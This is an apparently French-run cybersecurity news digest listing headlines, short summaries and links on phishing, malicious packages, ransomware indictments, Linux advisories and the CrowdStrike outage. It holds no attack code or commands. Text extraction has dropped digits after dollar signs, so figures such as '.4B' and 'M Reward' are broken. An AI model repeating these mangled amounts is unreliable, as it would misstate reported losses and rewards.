L'Actu de la presse spécialisée
Hackers Abuse Microsoft Office Forms to Launch Two-Step Phishing Attacks
Cybercriminals are increasingly using Microsoft Office Forms to launch sophisticated two-step phishing attacks. At present, certain individuals are being tricked into divulging their Microsoft 365 (M365) login information through Office Forms. Threat actors use the technique known as “external account takeover” or vendor email compromise to launch two-step phishing attacks throughout supply chains, using the email […]
The post Hackers Abuse Microsoft Office Forms to Launch Two-Step Phishing Attacks appeared first on Cyber Security News.
https://cybersecuritynews.com/two-step-phishing-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Beware Of Malicious Chrome Installer From Chinese Hackers
A malicious Chrome installer, ChromeSetup.msi, distributed via drive-by download, delivers a novel Gh0st RAT variant, dubbed Gh0stGambit, that evasively retrieves and executes encrypted payloads. The RAT is a modified open-source version targeting Chinese-speaking users with data theft and evasion capabilities, leveraging the long-standing Gh0st RAT, notorious for its use in cyber espionage operations, demonstrating continued […]
The post Beware Of Malicious Chrome Installer From Chinese Hackers appeared first on Cyber Security News.
https://cybersecuritynews.com/malicious-chrome-installer-alert/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Threat Actors Exploiting Selenium Grid Services For Cryptomining
Threat actors often exploit the cloud services for cryptomining, as doing so allows them to abuse the huge computational resources available. This enables them to significantly maximize their mining efficiency without bearing any cost. Cybersecurity analysts at Wiz recently identified that threat actors had been actively exploiting the Selenium Grid services for cryptomining. Selenium Grid […]
The post Threat Actors Exploiting Selenium Grid Services For Cryptomining appeared first on Cyber Security News.
https://cybersecuritynews.com/threat-actors-exploiting-selenium-grid-cryptomining/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
French Authorities Launch Operation to Remove PlugX Malware from Infected Systems
French judicial authorities, in collaboration with Europol, have launched a so-called "disinfection operation" to rid compromised hosts of a known malware called PlugX.
The Paris Prosecutor's Office, Parquet de Paris, said the initiative was launched on July 18 and that it's expected to continue for "several months."
It further said around a hundred victims located in France, Malta, Portugal,
https://thehackernews.com/2024/07/french-authorities-launch-operation-to.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Malicious PyPI Package Targets macOS to Steal Google Cloud Credentials
Cybersecurity researchers have discovered a malicious package on the Python Package Index (PyPI) repository that targets Apple macOS systems with the goal of stealing users' Google Cloud credentials from a narrow pool of victims.
The package, named "lr-utils-lib," attracted a total of 59 downloads before it was taken down. It was uploaded to the registry in early June 2024.
"The malware uses a
https://thehackernews.com/2024/07/malicious-pypi-package-targets-macos-to.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Fedora 40: darkhttpd 2024-25f8e34407 Security Advisory Updates
Update to 1.16 fixes rhbz#2259096
https://linuxsecurity.com/advisories/fedora/fedora-40-darkhttpd-2024-25f8e34407-security-advisory-updates-bxcgqczmxua4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Fedora 40: python-scrapy 2024-c27b82d702 Security Advisory Updates
Update to 2.11.2
https://linuxsecurity.com/advisories/fedora/fedora-40-python-scrapy-2024-c27b82d702-security-advisory-updates-w2wnxne6jyiu
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
L'Actu de la presse
Clay County reopens more offices following cyber attack - YouTube
Clay County reopens more offices following cyber attack. No views · 20 minutes ago ...more. WTWO WAWV TV. 8.09K.
https://www.youtube.com/watch%3Fv%3DaQHkuirGZ3U
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Optimizing neural networks using spider monkey optimization algorithm for intrusion detection system
From common tactics employed by cybercriminals to sophisticated state-sponsored campaigns, each form of cyber-attack presents unique challenges and ...
https://www.nature.com/articles/s41598-024-68342-6
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Paris Olympics: Massive Cyber Attack & Bomb Threat Put USA Basketball's Gameday Travel ...
Paris Olympics: Massive Cyber Attack & Bomb Threat Put USA Basketball's Gameday Travel Plans at Risk. ByAnuj Talwalkar. Jul 26, 2024 | 10:25 AM EDT.
https://www.essentiallysports.com/nba-active-basketball-news-paris-olympics-massive-cyber-attack-bomb-threat-put-usa-basketballs-gameday-travel-plans-at-risk/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cyber security threats ramp up; so do efforts to tamp down - WIBW
He says diversifying ...
https://www.wibw.com/2024/07/26/cyber-security-threats-ramp-up-so-do-efforts-tamp-down/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
L'Actu de la veille (Presse spécialisée)
A bug in Chrome Password Manager caused user credentials to disappear
Google addressed a Chrome’s Password Manager bug that caused user credentials to disappear temporarily for more than 18 hours. Google has addressed a bug in Chrome’s Password Manager that caused user credentials to disappear temporarily. An 18-hour outage impacted Google Chrome’s Password Manager on Wednesday, impacting users who rely on the tool to store and […]
https://securityaffairs.com/166200/security/chrome-password-manager-bug.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Crooks Bypassed Google's Email Verification to Create Workspace Accounts, Access 3rd-Party Services
Google says it recently fixed an authentication weakness that allowed crooks to circumvent email verification needed to create a Google Workspace account, and leverage that to impersonate a domain holder to third-party services that allow logins through Google's "Sign in with Google" feature.
https://krebsonsecurity.com/2024/07/crooks-bypassed-googles-email-verification-to-create-workspace-accounts-access-3rd-party-services/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Here's Why It's Time to Wake Up Again…
Uncertainty regarding the U.S. elections is in front of us, and given the many events that unfolded this month, I think we can expect plenty of more volatility where investors will be “trading the election” until we see the results in November.
https://hackernoon.com/heres-why-its-time-to-wake-up-again?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Millions of Devices Vulnerable to 'PKFail' Secure Boot Bypass Issue
Several vendors for consumer and enterprise PCs share a compromised crypto key that should never have been on the devices in the first place.
https://www.darkreading.com/endpoint-security/millions-of-devices-vulnerable-to-pkfail-secure-boot-bypass-issue
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
MEET48 "2024 GIPR2" Voting Event Final Results On August 3rd, Ranking Top On DappBay And DappRadar
The "2024 GIPR2" voting event Dapp of MEET48 has rapidly risen in the rankings on DappBay and DappRadar. The final voting rankings will determine the metaverse and overseas offline performance resources that participants will receive. The total accumulated votes in the event have exceeded 10 million.
https://hackernoon.com/meet48-2024-gipr2-voting-event-final-results-on-august-3rd-ranking-top-on-dappbay-and-dappradar?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Lessons from HackerOne's First Recharge Week
https://www.hackerone.com/culture-and-talent/lessons-hackerones-first-recharge-week
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CrowdStrike Outage Losses Estimated at a Staggering .4B
Researchers track the healthcare sector as experiencing the biggest financial losses, with banking and transportation following close behind.
https://www.darkreading.com/cybersecurity-operations/crowdstrike-outage-losses-estimated-staggering-54b
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Targeted PyPi Package Steals Google Cloud Credentials from macOS Devs
The campaign is laser-targeted, bucking the trend of "spray-and-pray" malicious open source packages turning up in code repositories seemingly every other day.
https://www.darkreading.com/threat-intelligence/targeted-pypi-package-steals-google-cloud-credentials-macos-devs
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Kwenta And Perennial: How They Are Kickstarting the Arbitrum Expansion With 1.9M ARB
Kwenta, the leading onchain perpetuals exchange on the Optimism network, has partnered with Perennial to launch a new product and incentive program on the Arbitrum network. The initiative, backed by a substantial 1.9 million ARB grant, aims to attract new users and liquidity providers to Arbitrum.
https://hackernoon.com/kwenta-and-perennial-how-they-are-kickstarting-the-arbitrum-expansion-with-19m-arb?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Crypto exchange Gemini discloses third-party data breach
Cryptocurrency exchange Gemini is warning it suffered a data breach incident caused by a cyberattack at its Automated Clearing House (ACH) service provider, whose name was not disclosed. [...]
https://www.bleepingcomputer.com/news/security/crypto-exchange-gemini-discloses-third-party-data-breach/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google fixes Chrome Password Manager bug that hides credentials
Google has fixed a bug in Chrome's Password Manager that caused user credentials to disappear temporarily for more than 18 hours. [...]
https://www.bleepingcomputer.com/news/google/google-fixes-chrome-password-manager-bug-that-hides-credentials/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
openSUSE: 2024:0223-1 important: opera Advisory Security Update
An update that fixes 29 vulnerabilities is now available.
https://linuxsecurity.com/advisories/opensuse/opensuse-2024-0223-1-important-opera-advisory-security-update-rnsqrxvdtwqx
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
FBCS data breach impact now reaches 4.2 million people
Debt collection agency Financial Business and Consumer Solutions (FBCS) has again increased the number of people impacted by a February data breach, now saying it affects 4.2 million people in the US. [...]
https://www.bleepingcomputer.com/news/security/fbcs-data-breach-impact-now-reaches-42-million-people/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Companies Struggle to Recover From CrowdStrike's Crippling Falcon Update
The cybersecurity firm says that 97% of sensors are back online, but some organizations continue to recover with costs tallied at .4 billion for the Fortune 500 alone.
https://www.darkreading.com/cybersecurity-operations/companies-struggle-to-recover-from-crowdstrike-crippling-falcon-update
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
US Offers M Reward for Information on North Korean Hacker
The individual is part of a DPRK-backed group known as Andariel, which is known for using the 'Maui' ransomware strain to target and extort healthcare entities.
https://www.darkreading.com/threat-intelligence/us-offers-10m-reward-for-information-on-north-korean-hacker
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Metasploit Weekly Wrap-Up 07/26/2024
New module content (3)
Magento XXE Unserialize Arbitrary File Read
Authors: Heyder and Sergey Temnikov
Type: Auxiliary
Pull request: #19304 contributed by heyder
Path: gather/magento_xxe_cve_2024_34102
AttackerKB reference: CVE-2024-34102
Description: This adds an auxiliary module for an XXE which results in an arbitrary file in Magento
https://blog.rapid7.com/2024/07/26/metasploit-weekly-wrap-up-41/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Finding Threats Efficiently: Q&A with Todd Willoughby, Director of Security & Privacy, RSM Defense.
Here are four reasons why an on-premises deployment might be the right choice for your organization. – Stephen Salinas, Head of Product Marketing, Stellar Cyber San Jose, Calif. – Jul. 26, 2024 Every organization has masses of data, and sifting through it to reveal cybersecurity
The post Finding Threats Efficiently: Q&A with Todd Willoughby, Director of Security & Privacy, RSM Defense. appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/stellar-cyber-qa/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Nvidia Embraces LLMs & Commonsense Cybersecurity Strategy
Nvidia doesn't just make the chips that accelerate a lot of AI applications — the company regularly creates and uses its own large language models, too.
https://www.darkreading.com/cyber-risk/nvidia-embraces-llms-and-commonsense-cybersecurity-strategy
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
July Windows Server updates break Remote Desktop connections
Microsoft has confirmed that July's security updates break remote desktop connections in organizations where Windows servers are configured to use the legacy RPC over HTTP protocol in the Remote Desktop Gateway. [...]
https://www.bleepingcomputer.com/news/microsoft/july-windows-server-updates-break-remote-desktop-connections/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Researchers Warn of Increased Cyberterrorism Activity Targeting Paris Olympics
Cyberterrorism is on the rise, posing a significant threat to global events like the Paris Olympics and elections,…
https://hackread.com/increased-cyberterrorism-activity-paris-olympics-warn/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Empowering Change: SI3's "Granting Access" Event Boosts Diversity in Web3
SI3, an organization championing women and non-binary individuals in the Web3 space, has announced its inaugural "Granting Access" event. The virtual gathering will connect participants with grant funding opportunities at major blockchain and protocol organizations. The event will kick off with a keynote presentation by Kara Howard, Co-Creator of SI3 and the Si Her Co-Active.
https://hackernoon.com/empowering-change-si3s-granting-access-event-boosts-diversity-in-web3?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Modern Terms and Concepts for a Zero Trust Mindset
When Zero Trust was first coined by John Kindervag in 2009, it challenged the “trust but verify” approach of traditional security models. At the time, Zero Trust required us to challenge the assumption that trust is implicit. Especially with the complex networks, systems, and services that we see in today's vast digital supply chain, trust cannot be not assumed at any level. As digital and operational infrastructure has evolved, so have the concepts to implementing Zero Trust. The phrase Zero...
https://cloudsecurityalliance.org/articles/modern-terms-and-concepts-for-a-zero-trust-mindset
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Acronis warns of Cyber Infrastructure default password abused in attacks
Acronis warned customers to patch a critical Cyber Infrastructure security flaw that lets attackers bypass authentication on vulnerable servers using default credentials. [...]
https://www.bleepingcomputer.com/news/security/acronis-warns-of-cyber-infrastructure-default-password-abused-in-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Omnity Network Launches Omnity AI
Omnity AI is an AI-powered multichain protocol for distributing tokens on social media. Anyone (Grant Makers) can create a Grant (with crypto tokens) to invite social media activity (from Grant Takers) The first Omnity AI agent, xAgent, uses LLM (Large Language Model) natural language processing to determine and distribute grants.
https://hackernoon.com/omnity-network-launches-omnity-ai?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
openSUSE: 2024:0222-1 important: python-nltk Advisory Security Update
An update that fixes one vulnerability is now available.
https://linuxsecurity.com/advisories/opensuse/opensuse-2024-0222-1-important-python-nltk-advisory-security-update-thpeysogqf5g
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Noonification: Last Mile of Blockchains: RPC and Node-as-a-Service (7/26/2024)
How are you, hacker?
🪐What's happening in tech this week:
The Noonification by HackerNoon has got you covered with fresh content from our top 5 stories of the day, every day at noon your local time! Set email preference here.
## Last Mile of Blockchains: RPC and Node-as-a-Service
By @blockchainize [ 5 Min read ]
This paper surveys methods for accessing blockchains, comparing full nodes and third-party services based on integrity, availability, and privacy. Read More.
4 Tactics SaaS Products Use to Nudge Users to Upgrade
By @alexdebecker [ 2 Min read ]
Learn how the best-in-class SaaS products nudge their users to upgrade to a (higher) paid plan. Tactics from Buffer, Beehiiv, Grammarly, and more. Read More.
Write on Interaction, Reputation, or Trust, Win up to 00 in Prizes...
https://hackernoon.com/7-26-2024-noonification?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Npm packages conceal macOS malware in 'travis.yml' files, drop bogus "Safari Updates"
Three npm packages identified by Sonatype this week conceal malware in "travis.yml," a CI/CD build configuration file used by Travis CI. These packages contain metadata, description, and code copied from the legitimate "cli-width" package but instead deploy malicious macOS binary, disguised as "Safari updates."
https://www.sonatype.com/blog/npm-packages-use-travis.yml-files-to-conceal-macos-malware-disguised-as-safari-updates
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ubuntu 6919-1: Linux kernel Security Advisory Updates
Several security issues were fixed in the Linux kernel.
https://linuxsecurity.com/advisories/ubuntu/ubuntu-6919-1-linux-kernel-security-advisory-updates-tfbtapxqkqgc
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Meta takes down 63,000 sextortion-related accounts on Instagram
Meta has taken down a whopping number of Instagram accounts directly involved in sextortion and more accounts aimed at training scammers
https://www.malwarebytes.com/blog/news/2024/07/meta-takes-down-63000-sextortion-related-accounts-on-instagram
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-6919-1: Linux kernel vulnerabilities
Ziming Zhang discovered that the DRM driver for VMware Virtual GPU did not
properly handle certain error conditions, leading to a NULL pointer
dereference. A local attacker could possibly trigger this vulnerability to
cause a denial of service. (CVE-2022-38096)
It was discovered that the ATA over Ethernet (AoE) driver in the Linux
kernel contained a race condition, leading to a use-after-free
vulnerability. An attacker could use this to cause a denial of service or
possibly execute arbitrary code. (CVE-2023-6270)
It was discovered that the Atheros 802.11ac wireless driver did not
properly validate certain data structures, leading to a NULL pointer
dereference. An attacker could possibly use this to cause a denial of
service. (CVE-2023-7042)
It was discovered that the HugeTLB file system...
https://ubuntu.com/security/notices/USN-6919-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Augmented Tree Data Structures
Data structures are a serious tool to store data conveniently. Modern applications have the flexibility to organize the data in the memory or on disk using various methods. Some augmentations can improve applications performance, other - compress the data stored in the memory.
https://hackernoon.com/augmented-tree-data-structures?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Court Reveals Wright's 2024 MYOB Email Was Manipulated to Support False Claims
Dr. Wright's MYOB Ontier email, supposedly from December 2019, was forged on 18 February 2024. The email was created to falsely support his claim that he provided MYOB login details in 2019. Expert analysis and court findings confirm the email's authenticity was manipulated to back up Dr. Wright's false testimony.
https://hackernoon.com/court-reveals-wrights-2024-myob-email-was-manipulated-to-support-false-claims?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ubuntu 6918-1: Linux kernel Security Advisory Updates
Several security issues were fixed in the Linux kernel.
https://linuxsecurity.com/advisories/ubuntu/ubuntu-6918-1-linux-kernel-security-advisory-updates-j3weif3e9ttx
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Debunking Craig Wright's Sartre Message
In May 2016, Dr. Craig Wright tried to prove he was Satoshi Nakamoto using the "Sartre Message." COPA alleges the message's signature was taken from a 2009 Bitcoin transaction and repurposed, exposing Wright's clumsy attempt at forgery.
https://hackernoon.com/debunking-craig-wrights-sartre-message?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-6918-1: Linux kernel vulnerabilities
It was discovered that a race condition existed in the Bluetooth subsystem
in the Linux kernel when modifying certain settings values through debugfs.
A privileged local attacker could use this to cause a denial of service.
Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
- ARM64 architecture;
- RISC-V architecture;
- S390 architecture;
- x86 architecture;
- Block layer subsystem;
- Compute Acceleration Framework;
- Accessibility subsystem;
- Android drivers;
- Drivers core;
- Bluetooth drivers;
- Clock framework and drivers;
- Data acquisition framework and drivers;
- Cryptographic API;
- Buffer Sharing and Synchronization framework;
...
https://ubuntu.com/security/notices/USN-6918-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Russian ransomware gangs account for 69% of all ransom proceeds
Russian-speaking threat actors accounted for at least 69% of all crypto proceeds linked to ransomware throughout the previous year, exceeding 0,000,000. [...]
https://www.bleepingcomputer.com/news/security/russian-ransomware-gangs-account-for-69-percent-of-all-ransom-proceeds/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Holodeck Heroes: Building AI Companions for the Final Frontier
This article is the third in the series of future technology articles—this one focusing on Large Language Models (LLMs) and how they're revolutionizing human-computer interactions.
https://hackernoon.com/holodeck-heroes-building-ai-companions-for-the-final-frontier?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
COPA takes Craig Wright to Court for Impersonating Satoshi Nakamoto with Forged Emails
COPA alleges Dr. Craig Wright forged a January 2014 email from "Satoshi Nakamoto" to support his claim of being Bitcoin's creator. Forensic evidence ties the email to Wright's computer, contradicting his explanations and suggesting deliberate fabrication.
https://hackernoon.com/copa-takes-craig-wright-to-court-for-impersonating-satoshi-nakamoto-with-forged-emails?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Balancing Blockchain Access: Local Nodes vs. Third-Party Services
The choice between running a local full node and relying on third-party services for blockchain access involves trade-offs in cost and security. Full nodes offer the best integrity, availability, and privacy but are expensive. Third-party services can be cost-effective but often lack data integrity guarantees and face availability issues. Emerging ultralight nodes offer a promising solution with reduced hardware requirements and verifiable data. Ensuring blockchain accessibility in a secure manner is crucial for the future of Web3 technology and its widespread adoption.
https://hackernoon.com/balancing-blockchain-access-local-nodes-vs-third-party-services?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Distributing Security Responsibilities (Responsibly)
Outlining the wider organization's proactive role in fortifying the security program allows the security team to focus on the most pressing issues that only they can solve.
https://www.darkreading.com/vulnerabilities-threats/distributing-security-responsibilities-responsibly
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
USN-6917-1: Linux kernel vulnerabilities
Ziming Zhang discovered that the DRM driver for VMware Virtual GPU did not
properly handle certain error conditions, leading to a NULL pointer
dereference. A local attacker could possibly trigger this vulnerability to
cause a denial of service. (CVE-2022-38096)
Gui-Dong Han discovered that the software RAID driver in the Linux kernel
contained a race condition, leading to an integer overflow vulnerability. A
privileged attacker could possibly use this to cause a denial of service
(system crash). (CVE-2024-23307)
It was discovered that a race condition existed in the Bluetooth subsystem
in the Linux kernel when modifying certain settings values through debugfs.
A privileged local attacker could use this to cause a denial of service.
(CVE-2024-24857, CVE-2024-24858, CVE-2024-24859)
Bai Jiaju...
https://ubuntu.com/security/notices/USN-6917-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Could Intel Have Fixed Spectre & Meltdown Bugs Earlier?
Intel works closely with academic researchers on hardware flaws and coordinates efforts with other vendors to roll out fixes for emerging vulnerabilities. That wasn't always the case.
https://www.darkreading.com/vulnerabilities-threats/could-intel-have-fixed-meltdown-spectre-earlier
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
New cyber security training packages launched to manage supply chain risk
NCSC publishes free e-learning to help organisations manage the cyber security risks across their supply chains.
https://www.ncsc.gov.uk/blog-post/new-cyber-security-training-packages-launched-to-manage-supply-chain-risk
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Key Takeaways From The Take Command Summit:Command Your Cloud
The Cloud security landscape is constantly changing. During the "Command Your Cloud" session at the Rapid7 Take Command Summit, industry experts Ryan Blanchard, Jeffrey Gardner and Devin Krugly shared vital strategies for staying ahead of that constant change.
https://blog.rapid7.com/2024/07/26/key-takeaways-from-the-take-command-summit-command-your-cloud/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
This AI-Powered Cybercrime Service Bundles Phishing Kits with Malicious Android Apps
A Spanish-speaking cybercrime group named GXC Team has been observed bundling phishing kits with malicious Android applications, taking malware-as-a-service (MaaS) offerings to the next level.
Singaporean cybersecurity company Group-IB, which has been tracking the e-crime actor since January 2023, described the crimeware solution as a "sophisticated AI-powered phishing-as-a-service platform"
https://thehackernews.com/2024/07/spanish-hackers-bundle-phishing-kits.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2024-6922: Automation Anywhere Automation 360 Server-Side Request Forgery
Automation 360 Robotic Process Automation suite v21-v32 is vulnerable to unauthenticated Server-Side Request Forgery (SSRF).
https://blog.rapid7.com/2024/07/26/cve-2024-6922-automation-anywhere-automation-360-server-side-request-forgery/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cybersecurity Mesh: The Future Of Network Defense
This week in cybersecurity from the editors at Cybercrime Magazine –Read the Full Forbes Story Sausalito, Calif. – Jul. 26, 2024 It’s shocking to hear that by 2025, cybercrime will cost the world economy .5 trillion annually — a 15 percent year-over-year increase since 2021, according to
The post Cybersecurity Mesh: The Future Of Network Defense appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/cybersecurity-mesh-the-future-of-network-defense/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Linux Mint 22: Elevating Security and Usability for Admins
Linux Mint has has long been recognized as a versatile and user-friendly distribution and has earned great popularity among administrators and security practitioners. Due to its stability, ease of use, and robust support system, the distro has quickly established itself in professional environments where reliability and performance are crucial.
https://linuxsecurity.com/news/desktop-security/linux-mint-22-elevating-security-and-usability-for-admins
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Sheltering from the Cyberattack Storm
As we move towards the summer and the promise of sunnier weather, it's worth noting that the cybersecurity industry has seen more rain than sunshine recently. A slew of high-profile...
The post Sheltering from the Cyberattack Storm appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/sheltering-from-the-cyberattack-storm/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google Chrome Modifies Privacy Sandbox To Allow Cookies
After much progress with Privacy Sandbox, Google has decided to roll back its most privacy-focused…
Google Chrome Modifies Privacy Sandbox To Allow Cookies on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/07/26/google-chrome-modifies-privacy-sandbox-to-allow-cookies/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ServiceNow Flaw Let Remote Attackers Execute Arbitrary Code
ServiceNow recently disclosed three critical vulnerabilities (CVE-2024-4879, CVE-2024-5217, and CVE-2024-5178) affecting multiple Now Platform versions, allowing unauthenticated remote code execution and unauthorized file access. The vulnerabilities, with CVSS scores ranging from 6.9 to 9.3, pose significant risks of data theft, system compromise, and operational disruption. Active exploitation attempts by foreign threat actors targeting both private […]
The post ServiceNow Flaw Let Remote Attackers Execute Arbitrary Code appeared first on Cyber Security News.
https://cybersecuritynews.com/servicenow-rce-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ConfusedFunction Vulnerability in Google Cloud Platform Let Attackers Escalate Privileges
A newly discovered vulnerability in Google Cloud Platform (GCP) has raised significant security concerns among users and experts alike. The vulnerability, dubbed “ConfusedFunction,” involves GCP’s Cloud Functions and Cloud Build services, potentially allowing attackers to escalate privileges and gain unauthorized access to various GCP services. Tenable Research, the cybersecurity firm that uncovered this flaw, has […]
The post ConfusedFunction Vulnerability in Google Cloud Platform Let Attackers Escalate Privileges appeared first on Cyber Security News.
https://cybersecuritynews.com/confusedfunction-vulnerability-google/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
BIND updates fix four high-severity DoS bugs in the DNS software suite
The Internet Systems Consortium (ISC) released BIND security updates that fixed several remotely exploitable DoS bugs in the DNS software suite. The Internet Systems Consortium (ISC) released security updates for BIND that address DoS vulnerabilities that could be remotely exploited. An attacker can exploit these vulnerabilities to disrupt DNS services. ISC addressed four high-severity vulnerabilities […]
https://securityaffairs.com/166190/security/bind-updates-high-severity-dos-bugs.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Offensive AI: The Sine Qua Non of Cybersecurity
"Peace is the virtue of civilization. War is its crime. Yet it is often in the furnace of war that the sharpest tools of peace are forged." - Victor Hugo.
In 1971, an unsettling message started appearing on several computers that comprised ARPANET, the precursor to what we now know as the Internet. The message, which read "I'm the Creeper: catch me if you can." was the output of a program named
https://thehackernews.com/2024/07/offensive-ai-sine-qua-non-of.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
US Charges North Korean Hacker for Ransomware Attacks on Hospitals
The North Korean hacker, Rim Jong Hyok, is accused of being part of the government-backed cyberespionage group Andariel,…
https://hackread.com/us-charges-north-korean-hacker-ransomware-attacks-hospitals/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Scam Attacks Taking Advantage of the Popularity of the Generative AI Wave
A direct correlation between GenAI's explosive popularity and scam attacks is addressed in this article, using plentiful data and a case study of network abuse.
The post Scam Attacks Taking Advantage of the Popularity of the Generative AI Wave appeared first on Unit 42.
https://unit42.paloaltonetworks.com/cybersquatting-using-genai-keywords/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
U.S. DoJ Indicts North Korean Hacker for Ransomware Attacks on Hospitals
The U.S. Department of Justice (DoJ) on Thursday unsealed an indictment against a North Korean military intelligence operative for allegedly carrying out ransomware attacks against healthcare facilities in the country and funneling the payments to orchestrate additional intrusions into defense, technology, and government entities across the world.
"Rim Jong Hyok and his co-conspirators deployed
https://thehackernews.com/2024/07/us-doj-indicts-north-korean-hacker-for.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
PKfail Vulnerability Allows Hackers to Install UEFI Malware on Over 200 Device Models
The PKfail vulnerability is a significant security issue affecting over 200 device models of Secure Boot. PKfail is a critical firmware supply-chain issue that undermines the Secure Boot process in the UEFI ecosystem. Secure Boot ensures that only trusted software is loaded during the boot process, preventing unauthorized code execution. However, PKfail compromises this security […]
The post PKfail Vulnerability Allows Hackers to Install UEFI Malware on Over 200 Device Models appeared first on Cyber Security News.
https://cybersecuritynews.com/pkfail-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
OpenStack Nova Vulnerability Allows Hackers Gain Unauthorized Access to Cloud Servers
A vulnerability in OpenStack’s Nova component has been identified, potentially allowing hackers to gain unauthorized access to cloud servers. This vulnerability, tracked as CVE-2024-40767, affects multiple versions of Nova and poses a serious risk to cloud infrastructure worldwide. CVE-2024-40767– OpenStack Nova Vulnerability Arnaud Morin of OVH discovered the vulnerability, which affects Nova versions less than […]
The post OpenStack Nova Vulnerability Allows Hackers Gain Unauthorized Access to Cloud Servers appeared first on Cyber Security News.
https://cybersecuritynews.com/openstack-nova-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Terrorist Activity is Accelerating in Cyberspace – Risk Precursor to Summer Olympics and Elections
Terrorist groups are increasingly using cyberspace and digital communication channels to plan and execute attacks. Yesterday Federal Bureau of Investigation (FBI) Director Christopher Wray expressed growing concerns over the potential for a coordinated foreign terrorist attack in the United States. During his testimony to the House Oversight Committee, Mr. Wray cited the ISIS-K attack on […]
https://securityaffairs.com/166179/breaking-news/terrorist-activity-alarm-terrorist-attacks.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ongoing Cyberattack Targets Exposed Selenium Grid Services for Crypto Mining
Cybersecurity researchers are sounding the alarm over an ongoing campaign that's leveraging internet-exposed Selenium Grid services for illicit cryptocurrency mining.
Cloud security firm Wiz is tracking the activity under the name SeleniumGreed. The campaign, which is targeting older versions of Selenium (3.141.59 and prior), is believed to be underway since at least April 2023.
"Unbeknownst to
https://thehackernews.com/2024/07/ongoing-cyberattack-targets-exposed.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CrowdStrike Warns of New Phishing Scam Targeting German Customers
CrowdStrike is alerting about an unfamiliar threat actor attempting to capitalize on the Falcon Sensor update fiasco to distribute dubious installers targeting German customers as part of a highly targeted campaign.
The cybersecurity company said it identified what it described as an unattributed spear-phishing attempt on July 24, 2024, distributing an inauthentic CrowdStrike Crash Reporter
https://thehackernews.com/2024/07/crowdstrike-warns-of-new-phishing-scam.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
